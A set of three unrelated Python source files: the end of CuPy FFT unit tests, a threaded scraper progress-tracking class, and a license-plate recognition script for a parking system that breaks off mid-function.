# only a single axis is transformed -> 1d plan preferred
for axes in [(0, ), (1, ), (2, )]:
assert _default_fft_func(ca, axes=axes) is _fft
# non-contiguous axes -> nd plan not possible
assert _default_fft_func(ca, axes=(0, 2)) is _fft
# >3 axes transformed -> nd plan not possible
ca = cupy.ones((2, 4, 6, 8))
assert _default_fft_func(ca) is _fft
# first or last axis not included -> nd plan not possible
assert _default_fft_func(ca, axes=(1, )) is _fft
@testing.gpu
@testing.slow
class TestFftAllocate(unittest.TestCase):
def test_fft_allocate(self):
# Check CuFFTError is not raised when the GPU memory is enough.
# See https://github.com/cupy/cupy/issues/1063
# TODO(mizuno): Simplify "a" after memory compaction is implemented.
a = []
for i in range(10):
a.append(cupy.empty(100000000))
del a
b = cupy.empty(100000007, dtype=cupy.float32)
cupy.fft.fft(b)
# Free huge memory for slow test
del b
cupy.get_default_memory_pool().free_all_blocks()
@testing.parameterize(
{'shape': (3, 4), 's': None, 'axes': None, 'norm': None},
{'shape': (3, 4), 's': (1, None), 'axes': None, 'norm': None},
{'shape': (3, 4), 's': (1, 5), 'axes': None, 'norm': None},
{'shape': (3, 4), 's': None, 'axes': (-2, -1), 'norm': None},
{'shape': (3, 4), 's': None, 'axes': (-1, -2), 'norm': None},
{'shape': (3, 4), 's': None, 'axes': (0,), 'norm': None},
{'shape': (3, 4), 's': None, 'axes': None, 'norm': 'ortho'},
{'shape': (2, 3, 4), 's': None, 'axes': None, 'norm': None},
{'shape': (2, 3, 4), 's': (1, 4, None), 'axes': None, 'norm': None},
{'shape': (2, 3, 4), 's': (1, 4, 10), 'axes': None, 'norm': None},
{'shape': (2, 3, 4), 's': None, 'axes': (-3, -2, -1), 'norm': None},
{'shape': (2, 3, 4), 's': None, 'axes': (-1, -2, -3), 'norm': None},
{'shape': (2, 3, 4), 's': None, 'axes': (0, 1), 'norm': None},
{'shape': (2, 3, 4), 's': None, 'axes': None, 'norm': 'ortho'},
{'shape': (2, 3, 4), 's': (2, 3), 'axes': (0, 1, 2), 'norm': 'ortho'},
{'shape': (2, 3, 4, 5), 's': None, 'axes': None, 'norm': None},
)
@testing.gpu
@testing.with_requires('numpy>=1.10.0')
class TestFft2(unittest.TestCase):
@nd_planning_states()
@testing.for_all_dtypes()
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, accept_error=ValueError,
contiguous_check=False)
def test_fft2(self, xp, dtype, enable_nd):
assert config.enable_nd_planning == enable_nd
a = testing.shaped_random(self.shape, xp, dtype)
out = xp.fft.fft2(a, s=self.s, norm=self.norm)
if xp == np and dtype in [np.float16, np.float32, np.complex64]:
out = out.astype(np.complex64)
return out
@nd_planning_states()
@testing.for_all_dtypes()
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, accept_error=ValueError,
contiguous_check=False)
def test_ifft2(self, xp, dtype, enable_nd):
assert config.enable_nd_planning == enable_nd
a = testing.shaped_random(self.shape, xp, dtype)
out = xp.fft.ifft2(a, s=self.s, norm=self.norm)
if xp == np and dtype in [np.float16, np.float32, np.complex64]:
out = out.astype(np.complex64)
return out
@testing.parameterize(
{'shape': (3, 4), 's': None, 'axes': None, 'norm': None},
{'shape': (3, 4), 's': (1, None), 'axes': None, 'norm': None},
{'shape': (3, 4), 's': (1, 5), 'axes': None, 'norm': None},
{'shape': (3, 4), 's': None, 'axes': (-2, -1), 'norm': None},
{'shape': (3, 4), 's': None, 'axes': (-1, -2), 'norm': None},
{'shape': (3, 4), 's': None, 'axes': [-1, -2], 'norm': None},
{'shape': (3, 4), 's': None, 'axes': (0,), 'norm': None},
{'shape': (3, 4), 's': None, 'axes': (), 'norm': None},
{'shape': (3, 4), 's': None, 'axes': None, 'norm': 'ortho'},
{'shape': (2, 3, 4), 's': None, 'axes': None, 'norm': None},
{'shape': (2, 3, 4), 's': (1, 4, None), 'axes': None, 'norm': None},
{'shape': (2, 3, 4), 's': (1, 4, 10), 'axes': None, 'norm': None},
{'shape': (2, 3, 4), 's': None, 'axes': (-3, -2, -1), 'norm': None},
{'shape': (2, 3, 4), 's': None, 'axes': (-1, -2, -3), 'norm': None},
{'shape': (2, 3, 4), 's': None, 'axes': (-1, -3), 'norm': None},
{'shape': (2, 3, 4), 's': None, 'axes': (0, 1), 'norm': None},
{'shape': (2, 3, 4), 's': None, 'axes': None, 'norm': 'ortho'},
{'shape': (2, 3, 4), 's': (2, 3), 'axes': (0, 1, 2), 'norm': 'ortho'},
{'shape': (2, 3, 4), 's': (4, 3, 2), 'axes': (2, 0, 1), 'norm': 'ortho'},
{'shape': (2, 3, 4, 5), 's': None, 'axes': None, 'norm': None},
)
@testing.gpu
@testing.with_requires('numpy>=1.10.0')
class TestFftn(unittest.TestCase):
@nd_planning_states()
@testing.for_all_dtypes()
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, accept_error=ValueError,
contiguous_check=False)
def test_fftn(self, xp, dtype, enable_nd):
assert config.enable_nd_planning == enable_nd
a = testing.shaped_random(self.shape, xp, dtype)
out = xp.fft.fftn(a, s=self.s, axes=self.axes, norm=self.norm)
if self.axes is not None and not self.axes:
assert out is a
return out
if xp == np and dtype in [np.float16, np.float32, np.complex64]:
out = out.astype(np.complex64)
return out
@nd_planning_states()
@testing.for_all_dtypes()
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, accept_error=ValueError,
contiguous_check=False)
def test_ifftn(self, xp, dtype, enable_nd):
assert config.enable_nd_planning == enable_nd
a = testing.shaped_random(self.shape, xp, dtype)
out = xp.fft.ifftn(a, s=self.s, axes=self.axes, norm=self.norm)
if self.axes is not None and not self.axes:
assert out is a
return out
if xp == np and dtype in [np.float16, np.float32, np.complex64]:
out = out.astype(np.complex64)
return out
@testing.parameterize(
{'shape': (3, 4), 's': None, 'axes': None, 'norm': None},
{'shape': (3, 4), 's': (1, 5), 'axes': None, 'norm': None},
{'shape': (3, 4), 's': None, 'axes': (-2, -1), 'norm': None},
{'shape': (3, 4), 's': None, 'axes': (-1, -2), 'norm': None},
{'shape': (3, 4), 's': None, 'axes': (0,), 'norm': None},
{'shape': (3, 4), 's': None, 'axes': None, 'norm': 'ortho'},
{'shape': (2, 3, 4), 's': None, 'axes': None, 'norm': None},
{'shape': (2, 3, 4), 's': (1, 4, 10), 'axes': None, 'norm': None},
{'shape': (2, 3, 4), 's': None, 'axes': (-3, -2, -1), 'norm': None},
{'shape': (2, 3, 4), 's': None, 'axes': (-1, -2, -3), 'norm': None},
{'shape': (2, 3, 4), 's': None, 'axes': (0, 1), 'norm': None},
{'shape': (2, 3, 4), 's': None, 'axes': None, 'norm': 'ortho'},
{'shape': (2, 3, 4), 's': (2, 3), 'axes': None, 'norm': 'ortho'},
{'shape': (2, 3, 4), 's': (2, 3), 'axes': (0, 1, 2), 'norm': 'ortho'},
)
@testing.gpu
@testing.with_requires('numpy>=1.10.0')
class TestPlanCtxManagerFftn(unittest.TestCase):
@nd_planning_states()
@testing.for_complex_dtypes()
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, accept_error=ValueError,
contiguous_check=False)
def test_fftn(self, xp, dtype, enable_nd):
assert config.enable_nd_planning == enable_nd
a = testing.shaped_random(self.shape, xp, dtype)
if xp == cupy:
from cupyx.scipy.fftpack import get_fft_plan
plan = get_fft_plan(a, self.s, self.axes)
with plan:
out = xp.fft.fftn(a, s=self.s, axes=self.axes, norm=self.norm)
else:
out = xp.fft.fftn(a, s=self.s, axes=self.axes, norm=self.norm)
if xp == np and dtype is np.complex64:
out = out.astype(np.complex64)
return out
@nd_planning_states()
@testing.for_complex_dtypes()
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, accept_error=ValueError,
contiguous_check=False)
def test_ifftn(self, xp, dtype, enable_nd):
assert config.enable_nd_planning == enable_nd
a = testing.shaped_random(self.shape, xp, dtype)
if xp == cupy:
from cupyx.scipy.fftpack import get_fft_plan
plan = get_fft_plan(a, self.s, self.axes)
with plan:
out = xp.fft.ifftn(a, s=self.s, axes=self.axes, norm=self.norm)
else:
out = xp.fft.ifftn(a, s=self.s, axes=self.axes, norm=self.norm)
if xp == np and dtype is np.complex64:
out = out.astype(np.complex64)
return out
@nd_planning_states()
@testing.for_complex_dtypes()
def test_fftn_error_on_wrong_plan(self, dtype, enable_nd):
# This test ensures the context manager plan is picked up
from cupyx.scipy.fftpack import get_fft_plan
from cupy.fft import fftn
assert config.enable_nd_planning == enable_nd
# can't get a plan, so skip
if self.axes is not None:
if self.s is not None:
if len(self.s) != len(self.axes):
return
elif len(self.shape) != len(self.axes):
return
a = testing.shaped_random(self.shape, cupy, dtype)
bad_in_shape = tuple(2*i for i in self.shape)
if self.s is None:
bad_out_shape = bad_in_shape
else:
bad_out_shape = tuple(2*i for i in self.s)
b = testing.shaped_random(bad_in_shape, cupy, dtype)
plan_wrong = get_fft_plan(b, bad_out_shape, self.axes)
with pytest.raises(ValueError) as ex, plan_wrong:
fftn(a, s=self.s, axes=self.axes, norm=self.norm)
# targeting a particular error
assert 'The CUFFT plan and a.shape do not match' in str(ex.value)
@testing.parameterize(*testing.product({
'n': [None, 5, 10, 15],
'shape': [(10,), ],
'norm': [None, 'ortho'],
}))
@testing.gpu
@testing.with_requires('numpy>=1.10.0')
class TestPlanCtxManagerFft(unittest.TestCase):
@testing.for_complex_dtypes()
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, accept_error=ValueError,
contiguous_check=False)
def test_fft(self, xp, dtype):
a = testing.shaped_random(self.shape, xp, dtype)
if xp == cupy:
from cupyx.scipy.fftpack import get_fft_plan
shape = (self.n,) if self.n is not None else None
plan = get_fft_plan(a, shape=shape)
assert isinstance(plan, cupy.cuda.cufft.Plan1d)
with plan:
out = xp.fft.fft(a, n=self.n, norm=self.norm)
else:
out = xp.fft.fft(a, n=self.n, norm=self.norm)
# np.fft.fft alway returns np.complex128
if xp == np and dtype is np.complex64:
out = out.astype(np.complex64)
return out
@testing.for_complex_dtypes()
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, accept_error=ValueError,
contiguous_check=False)
def test_ifft(self, xp, dtype):
a = testing.shaped_random(self.shape, xp, dtype)
if xp == cupy:
from cupyx.scipy.fftpack import get_fft_plan
shape = (self.n,) if self.n is not None else None
plan = get_fft_plan(a, shape=shape)
assert isinstance(plan, cupy.cuda.cufft.Plan1d)
with plan:
out = xp.fft.ifft(a, n=self.n, norm=self.norm)
else:
out = xp.fft.ifft(a, n=self.n, norm=self.norm)
if xp == np and dtype is np.complex64:
out = out.astype(np.complex64)
return out
@testing.for_complex_dtypes()
def test_fft_error_on_wrong_plan(self, dtype):
# This test ensures the context manager plan is picked up
from cupyx.scipy.fftpack import get_fft_plan
from cupy.fft import fft
a = testing.shaped_random(self.shape, cupy, dtype)
bad_shape = tuple(5*i for i in self.shape)
b = testing.shaped_random(bad_shape, cupy, dtype)
plan_wrong = get_fft_plan(b)
assert isinstance(plan_wrong, cupy.cuda.cufft.Plan1d)
with pytest.raises(ValueError) as ex, plan_wrong:
fft(a, n=self.n, norm=self.norm)
# targeting a particular error
assert 'Target array size does not match the plan.' in str(ex.value)
@testing.parameterize(
{'shape': (3, 4), 's': None, 'axes': None, 'norm': None},
{'shape': (3, 4), 's': None, 'axes': (-2, -1), 'norm': None},
{'shape': (3, 4), 's': None, 'axes': (-1, -2), 'norm': None},
{'shape': (3, 4), 's': None, 'axes': (0,), 'norm': None},
{'shape': (3, 4), 's': None, 'axes': None, 'norm': 'ortho'},
{'shape': (2, 3, 4), 's': (1, 4, None), 'axes': None, 'norm': None},
{'shape': (2, 3, 4), 's': (1, 4, 10), 'axes': None, 'norm': None},
{'shape': (2, 3, 4), 's': None, 'axes': (-3, -2, -1), 'norm': None},
{'shape': (2, 3, 4), 's': None, 'axes': (-1, -2, -3), 'norm': None},
{'shape': (2, 3, 4), 's': None, 'axes': (0, 1), 'norm': None},
{'shape': (2, 3, 4), 's': None, 'axes': None, 'norm': 'ortho'},
{'shape': (2, 3, 4, 5), 's': None, 'axes': (-3, -2, -1), 'norm': None},
)
@testing.gpu
class TestFftnContiguity(unittest.TestCase):
@nd_planning_states([True])
@testing.for_all_dtypes()
def test_fftn_orders(self, dtype, enable_nd):
for order in ['C', 'F']:
a = testing.shaped_random(self.shape, cupy, dtype)
if order == 'F':
a = cupy.asfortranarray(a)
out = cupy.fft.fftn(a, s=self.s, axes=self.axes)
fft_func = _default_fft_func(a, s=self.s, axes=self.axes)
if fft_func is _fftn:
# nd plans have output with contiguity matching the input
self.assertEqual(out.flags.c_contiguous, a.flags.c_contiguous)
self.assertEqual(out.flags.f_contiguous, a.flags.f_contiguous)
else:
# 1d planning case doesn't guarantee preserved contiguity
pass
@nd_planning_states([True])
@testing.for_all_dtypes()
def test_ifftn_orders(self, dtype, enable_nd):
for order in ['C', 'F']:
a = testing.shaped_random(self.shape, cupy, dtype)
if order == 'F':
a = cupy.asfortranarray(a)
out = cupy.fft.ifftn(a, s=self.s, axes=self.axes)
fft_func = _default_fft_func(a, s=self.s, axes=self.axes)
if fft_func is _fftn:
# nd plans have output with contiguity matching the input
self.assertEqual(out.flags.c_contiguous, a.flags.c_contiguous)
self.assertEqual(out.flags.f_contiguous, a.flags.f_contiguous)
else:
# 1d planning case doesn't guarantee preserved contiguity
pass
@testing.parameterize(*testing.product({
'n': [None, 5, 10, 15],
'shape': [(10,), (10, 10)],
'norm': [None, 'ortho'],
}))
@testing.gpu
@testing.with_requires('numpy>=1.10.0')
class TestRfft(unittest.TestCase):
@testing.for_all_dtypes(no_complex=True)
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, contiguous_check=False)
def test_rfft(self, xp, dtype):
# the scaling of old Numpy is incorrect
if np.__version__ < np.lib.NumpyVersion('1.13.0'):
if self.n is not None:
return xp.empty(0)
a = testing.shaped_random(self.shape, xp, dtype)
out = xp.fft.rfft(a, n=self.n, norm=self.norm)
if xp == np and dtype in [np.float16, np.float32, np.complex64]:
out = out.astype(np.complex64)
return out
@testing.for_all_dtypes()
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, contiguous_check=False)
def test_irfft(self, xp, dtype):
a = testing.shaped_random(self.shape, xp, dtype)
out = xp.fft.irfft(a, n=self.n, norm=self.norm)
if xp == np and dtype in [np.float16, np.float32, np.complex64]:
out = out.astype(np.float32)
return out
@testing.parameterize(
{'shape': (3, 4), 's': None, 'axes': None, 'norm': None},
{'shape': (3, 4), 's': (1, None), 'axes': None, 'norm': None},
{'shape': (3, 4), 's': (1, 5), 'axes': None, 'norm': None},
{'shape': (3, 4), 's': None, 'axes': (-2, -1), 'norm': None},
{'shape': (3, 4), 's': None, 'axes': (-1, -2), 'norm': None},
{'shape': (3, 4), 's': None, 'axes': (0,), 'norm': None},
{'shape': (3, 4), 's': None, 'axes': None, 'norm': 'ortho'},
{'shape': (2, 3, 4), 's': None, 'axes': None, 'norm': None},
{'shape': (2, 3, 4), 's': (1, 4, None), 'axes': None, 'norm': None},
{'shape': (2, 3, 4), 's': (1, 4, 10), 'axes': None, 'norm': None},
{'shape': (2, 3, 4), 's': None, 'axes': (-3, -2, -1), 'norm': None},
{'shape': (2, 3, 4), 's': None, 'axes': (-1, -2, -3), 'norm': None},
{'shape': (2, 3, 4), 's': None, 'axes': (0, 1), 'norm': None},
{'shape': (2, 3, 4), 's': None, 'axes': None, 'norm': 'ortho'},
{'shape': (2, 3, 4), 's': (2, 3), 'axes': (0, 1, 2), 'norm': 'ortho'},
{'shape': (2, 3, 4, 5), 's': None, 'axes': None, 'norm': None},
)
@testing.gpu
@testing.with_requires('numpy>=1.10.0')
class TestRfft2(unittest.TestCase):
@testing.for_all_dtypes(no_complex=True)
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, accept_error=ValueError,
contiguous_check=False)
def test_rfft2(self, xp, dtype):
# the scaling of old Numpy is incorrect
if np.__version__ < np.lib.NumpyVersion('1.13.0'):
if self.s is not None:
return xp.empty(0)
a = testing.shaped_random(self.shape, xp, dtype)
out = xp.fft.rfft2(a, s=self.s, norm=self.norm)
if xp == np and dtype in [np.float16, np.float32, np.complex64]:
out = out.astype(np.complex64)
return out
@testing.for_all_dtypes()
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, accept_error=ValueError,
contiguous_check=False)
def test_irfft2(self, xp, dtype):
a = testing.shaped_random(self.shape, xp, dtype)
out = xp.fft.irfft2(a, s=self.s, norm=self.norm)
if xp == np and dtype in [np.float16, np.float32, np.complex64]:
out = out.astype(np.float32)
return out
@testing.parameterize(
{'shape': (3, 4), 's': None, 'axes': None, 'norm': None},
{'shape': (3, 4), 's': (1, None), 'axes': None, 'norm': None},
{'shape': (3, 4), 's': (1, 5), 'axes': None, 'norm': None},
{'shape': (3, 4), 's': None, 'axes': (-2, -1), 'norm': None},
{'shape': (3, 4), 's': None, 'axes': (-1, -2), 'norm': None},
{'shape': (3, 4), 's': None, 'axes': (0,), 'norm': None},
{'shape': (3, 4), 's': None, 'axes': None, 'norm': 'ortho'},
{'shape': (2, 3, 4), 's': None, 'axes': None, 'norm': None},
{'shape': (2, 3, 4), 's': (1, 4, None), 'axes': None, 'norm': None},
{'shape': (2, 3, 4), 's': (1, 4, 10), 'axes': None, 'norm': None},
{'shape': (2, 3, 4), 's': None, 'axes': (-3, -2, -1), 'norm': None},
{'shape': (2, 3, 4), 's': None, 'axes': (-1, -2, -3), 'norm': None},
{'shape': (2, 3, 4), 's': None, 'axes': (0, 1), 'norm': None},
{'shape': (2, 3, 4), 's': None, 'axes': None, 'norm': 'ortho'},
{'shape': (2, 3, 4), 's': (2, 3), 'axes': (0, 1, 2), 'norm': 'ortho'},
{'shape': (2, 3, 4, 5), 's': None, 'axes': None, 'norm': None},
)
@testing.gpu
@testing.with_requires('numpy>=1.10.0')
class TestRfftn(unittest.TestCase):
@testing.for_all_dtypes(no_complex=True)
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, accept_error=ValueError,
contiguous_check=False)
def test_rfftn(self, xp, dtype):
a = testing.shaped_random(self.shape, xp, dtype)
out = xp.fft.rfftn(a, s=self.s, axes=self.axes, norm=self.norm)
if xp == np and dtype in [np.float16, np.float32, np.complex64]:
out = out.astype(np.complex64)
return out
@testing.for_all_dtypes()
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, accept_error=ValueError,
contiguous_check=False)
def test_irfftn(self, xp, dtype):
if (10020 >= cupy.cuda.runtime.runtimeGetVersion() >= 10010
and int(cupy.cuda.device.get_compute_capability()) < 70
and _size_last_transform_axis(
self.shape, self.s, self.axes) == 2):
raise unittest.SkipTest('work-around for cuFFT issue')
a = testing.shaped_random(self.shape, xp, dtype)
out = xp.fft.irfftn(a, s=self.s, axes=self.axes, norm=self.norm)
if xp == np and dtype in [np.float16, np.float32, np.complex64]:
out = out.astype(np.float32)
return out
@testing.parameterize(*testing.product({
'n': [None, 5, 10, 15],
'shape': [(10,), (10, 10)],
'norm': [None, 'ortho'],
}))
@testing.gpu
@testing.with_requires('numpy>=1.10.0')
class TestHfft(unittest.TestCase):
@testing.for_all_dtypes()
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, contiguous_check=False)
def test_hfft(self, xp, dtype):
a = testing.shaped_random(self.shape, xp, dtype)
out = xp.fft.hfft(a, n=self.n, norm=self.norm)
if xp == np and dtype in [np.float16, np.float32, np.complex64]:
out = out.astype(np.float32)
return out
@testing.for_all_dtypes(no_complex=True)
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, contiguous_check=False)
def test_ihfft(self, xp, dtype):
a = testing.shaped_random(self.shape, xp, dtype)
out = xp.fft.ihfft(a, n=self.n, norm=self.norm)
if xp == np and dtype in [np.float16, np.float32, np.complex64]:
out = out.astype(np.complex64)
return out
@testing.parameterize(
{'n': 1, 'd': 1},
{'n': 10, 'd': 0.5},
{'n': 100, 'd': 2},
)
@testing.gpu
@testing.with_requires('numpy>=1.10.0')
class TestFftfreq(unittest.TestCase):
@testing.for_all_dtypes()
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, contiguous_check=False)
def test_fftfreq(self, xp, dtype):
out = xp.fft.fftfreq(self.n, self.d)
return out
@testing.for_all_dtypes()
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, contiguous_check=False)
def test_rfftfreq(self, xp, dtype):
out = xp.fft.rfftfreq(self.n, self.d)
return out
@testing.parameterize(
{'shape': (5,), 'axes': None},
{'shape': (5,), 'axes': 0},
{'shape': (10,), 'axes': None},
{'shape': (10,), 'axes': 0},
{'shape': (10, 10), 'axes': None},
{'shape': (10, 10), 'axes': 0},
{'shape': (10, 10), 'axes': (0, 1)},
)
@testing.gpu
@testing.with_requires('numpy>=1.10.0')
class TestFftshift(unittest.TestCase):
@testing.for_all_dtypes()
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, contiguous_check=False)
def test_fftshift(self, xp, dtype):
x = testing.shaped_random(self.shape, xp, dtype)
out = xp.fft.fftshift(x, self.axes)
return out
@testing.for_all_dtypes()
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, contiguous_check=False)
def test_ifftshift(self, xp, dtype):
x = testing.shaped_random(self.shape, xp, dtype)
out = xp.fft.ifftshift(x, self.axes)
return out
class TestThreading(unittest.TestCase):
def test_threading1(self):
import threading
from cupy.cuda.cufft import get_current_plan
def thread_get_curr_plan():
return get_current_plan()
new_thread = threading.Thread(target=thread_get_curr_plan)
new_thread.start()
def test_threading2(self):
import threading
a = cupy.arange(100, dtype=cupy.complex64).reshape(10, 10)
def thread_do_fft():
b = cupy.fft.fftn(a)
return b
new_thread = threading.Thread(target=thread_do_fft)
new_thread.start()
|
process.py
|
import os
import queue
import threading
from utils.scraper import Scraper
class Process(Scraper):
def __init__(self, site, base_dir, parse_count=10, threads=1):
self._base_dir = base_dir
self._progress_file = self._base_dir + "/progress"
self.log_file = self._base_dir + "/logs"
self._url_header = {'User-Agent': 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)'}
self._last_id = 0
self._max_id = 0
self._parse_count = parse_count
self._threads = threads
self._q = queue.Queue()
super().__init__(self.log_file)
self.site = site(self._base_dir, self._url_header, self.log_file)
def start(self):
self._max_id = self.site.get_latest()
start_val = 1
# Get start val from progress file if exist
if os.path.isfile(self._progress_file):
with open(self._progress_file, 'r') as outfile:
start_val = int(outfile.read())+1
print(self.log("##\tStarting at: " + str(start_val)))
# Find out where to stop
end_val = start_val + self._parse_count
if self._parse_count == 0 and self._max_id != 0:
end_val = self._max_id
for i in range(self._threads):
t = threading.Thread(target=self._thread_setup)
t.daemon = True
t.start()
for item_id in range(start_val, end_val):
self._q.put(item_id)
self._q.join()
self._done()
def _thread_setup(self):
while True:
num = self._q.get()
print(self.log("Processing: " + str(num)), end='\r')
try:
self.site.parse(num)
except Exception as e:
print(self.log("Exception [parse thread]: " + str(e)))
self.stop()
# Having self._last_id here, it may reparse the same thing on next run
# because the last item processed may not have been the last item in the list because it is async
self._last_id = num
self._q.task_done()
def _done(self):
"""
Done parsing/downloading, clean up and save progress
:return:
"""
print("\n") # Since we are using `\r` above, we need to enter down when exiting the script
self.save_progress(self._progress_file, self._last_id)
def stop(self):
# not sure what is the last thread to run since it is async, so reparse all current threads on next start
self._last_id -= self._threads
self._done()
|
main_multiprocess.py
|
import csv
import sklearn
import imutils
import argparse
import cv2
import numpy as np
import Preprocess as pp
import os
import time
import datetime
import tensorflow as tf
import math
import Calibration as cal
import collections
import DetectChars
import DetectPlates
import PossiblePlate
import paho.mqtt.client as paho
import time
from imutils.video import WebcamVideoStream
from database import data,check
from queue import Queue
from threading import Thread
from utils.app_utils import FPS, WebcamVideoStream
# Module level variables for image ##########################################################################
SCALAR_BLACK = (0.0, 0.0, 0.0)
SCALAR_WHITE = (255.0, 255.0, 255.0)
SCALAR_YELLOW = (0.0, 255.0, 255.0)
SCALAR_GREEN = (0.0, 255.0, 0.0)
SCALAR_RED = (0.0, 0.0, 255.0)
VERIF = 2 # number for verification the plate license
# Main ##################################################################################################
def alpr(frame, sess, detection_graph):
# add knn library for detect chars
blnKNNTrainingSuccessful = DetectChars.loadKNNDataAndTrainKNN() # attempt KNN training
if blnKNNTrainingSuccessful == False: # if KNN training was not successful
print("\nerror: KNN traning was not successful\n") # show error message
return
count = 0
# not very important, just iterating for license array haha
license = []
VER = np.zeros(VERIF)
for x in VER:
license.append("")
numlicense = ""
knn = 0
loop=True
# resize the frame and convert it to grayscale
imgOriginalScene = imutils.resize(frame)
imgGrayscale, imgThresh = pp.preprocess(imgOriginalScene)
#cv2.imshow("threshold", imgThresh)
#imgOriginalScene = imutils.transform (imgOriginalScene)
imgOriginalScene, licenses = searching(imgOriginalScene,loop)
# only save 5 same license each time
license[count+1] = licenses
nums = license[VERIF-1]
if (license[count] == license[count+1]):
license[count]=license[count+1]
count = count + 1
elif (license[count] != license[count+1]):
coba = license[count+1]
count = 0
license[count] = coba
if count == (VERIF-1):
'''
plateAlloc = " "
numstring = ""
numbers = sum(c.isdigit() for c in nums)
words = sum(c.isalpha() for c in nums)
for c in nums:
numstring.append()
'''
global plat
plat = " "
plat = list(plat)
numstring = ""
numstring = list(numstring)
alphastring = ""
alphastring = list(alphastring)
numbers = sum(c.isdigit() for c in nums)
words = sum(c.isalpha() for c in nums)
for i in nums:
#nums = np.array(nums)
#nums = list(nums)
if i.isalpha():
#nums[i] = np.array(nums[i])
alphastring.append(i)
elif i.isdigit():
#nums[i] = np.array(nums[i])
numstring.append(i)
print(nums)
print(numstring)
print(alphastring)
#add numbers
a = 2
for b in numstring:
plat[a] = b
a+=1
#add front letter(s)
c = 0
sumfront = sum(c.isalpha() for c in nums[0:2])
if (sumfront == 1):
for d in nums[0:1]:
plat[c] = d
c+=1
elif (sumfront == 2):
for d in nums[0:2]:
plat[c] = d
c+=1
#add back letter(s)
e = -3
sumback = sum(e.isalpha() for e in nums[-3:])
if (sumback == 1):
for f in nums[-1:]:
plat[e] = f
e+=1
elif (sumback == 2):
for f in nums[-2:]:
plat[e] = f
e+=1
elif (sumback == 3):
for f in nums[-3:]:
plat[e] = f
e+=1
plat = ''.join(plat)
if (license[VERIF-1] == ""):
print("no characters were detected\n")
else:
#if number license same, not be saved
if (numlicense == license[VERIF-1]):
print("still = " + numlicense + "\n")
elif (len(nums) <= 9 and nums[0] >= 'A' and nums[0] <= 'Z' and numbers <= 4 and words <= 5):
numlicense = license[VERIF-1]
print("A new license plate read from image = " + plat + "\n")
insertdata= data(numlicense)
if check(numlicense):
ts = time.time()
timestamp = datetime.datetime.fromtimestamp(ts).strftime('%Y-%m-%d')
timestamp2 = datetime.datetime.fromtimestamp(ts).strftime('%H:%M:%S')
#Ganti Path sesuai dengan laptop masing2 heheh
namefile = "/var/www/html/MonitoringDashboard/hasil_parksystem/"+ license[VERIF-1] + timestamp + timestamp2 + ".png"
cv2.imwrite(namefile, imgOriginalScene)
#Hapus bagian ini untuk tidak menggunakan sensor dan mengirim mqtt
#broker="192.168.8.120"
#port=1883
#client1= paho.Client("control1") #create client object
#client1.connect(broker,port) #establish connection
#ret= client1.publish("xiaomi/to/write",'{"cmd": "write", "model": "plug", "sid": "158d0002365abb", "data": {"status": "on"}}')
# broker="192.168.1.151"
# port=1883
# client1= paho.Client("control1") #create client object
# client1.connect(broker,port) #establish connection
# client1.publish("alpr/mqtt","0")
# os.system('spd-say "Welcome to Graha Sumber Prima Elektronik"')
count = 0
cv2.putText(imgOriginalScene,"Press 's' to save frame to be 'save.png', for calibrating",(10,30),cv2.FONT_HERSHEY_SIMPLEX, 0.5,(255,255,255),1,bottomLeftOrigin = False)
cv2.rectangle(imgOriginalScene,((int(imgOriginalScene.shape[1]/2-230)),(int(imgOriginalScene.shape[0]/2-80))),((int(imgOriginalScene.shape[1]/2+230)),(int(imgOriginalScene.shape[0]/2+80))),SCALAR_GREEN,3)
try:
return dict(imgOriginalScenes=imgOriginalScene)
except:
return {}
def worker(input_q, output_q):
# Load a (frozen) Tensorflow model into memory.
detection_graph = tf.Graph()
sess = tf.Session(graph=detection_graph)
fps = FPS().start()
while True:
fps.update()
frame = input_q.get()
#frame_rgb = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
#output_q.put(face_recog(frame_rgb, sess, detection_graph))
output_q.put(alpr(frame, sess, detection_graph))
fps.stop()
sess.close()
def drawRedRectangleAroundPlate(imgOriginalScene, licPlate):
p2fRectPoints = cv2.boxPoints(licPlate.rrLocationOfPlateInScene) # get 4 vertices of rotated rect
cv2.line(imgOriginalScene, tuple(p2fRectPoints[0]), tuple(p2fRectPoints[1]), SCALAR_RED, 2) # draw 4 red lines
cv2.line(imgOriginalScene, tuple(p2fRectPoints[1]), tuple(p2fRectPoints[2]), SCALAR_RED, 2)
cv2.line(imgOriginalScene, tuple(p2fRectPoints[2]), tuple(p2fRectPoints[3]), SCALAR_RED, 2)
cv2.line(imgOriginalScene, tuple(p2fRectPoints[3]), tuple(p2fRectPoints[0]), SCALAR_RED, 2)
# end function
###################################################################################################
def writeLicensePlateCharsOnImage(imgOriginalScene, licPlate):
ptCenterOfTextAreaX = 0 # this will be the center of the area the text will be written to
ptCenterOfTextAreaY = 0
ptLowerLeftTextOriginX = 0 # this will be the bottom left of the area that the text will be written to
ptLowerLeftTextOriginY = 0
sceneHeight, sceneWidth, sceneNumChannels = imgOriginalScene.shape
plateHeight, plateWidth, plateNumChannels = licPlate.imgPlate.shape
intFontFace = cv2.FONT_HERSHEY_SIMPLEX # choose a plain jane font
fltFontScale = float(plateHeight) / 30.0 # base font scale on height of plate area
intFontThickness = int(round(fltFontScale * 1.5)) # base font thickness on font scale
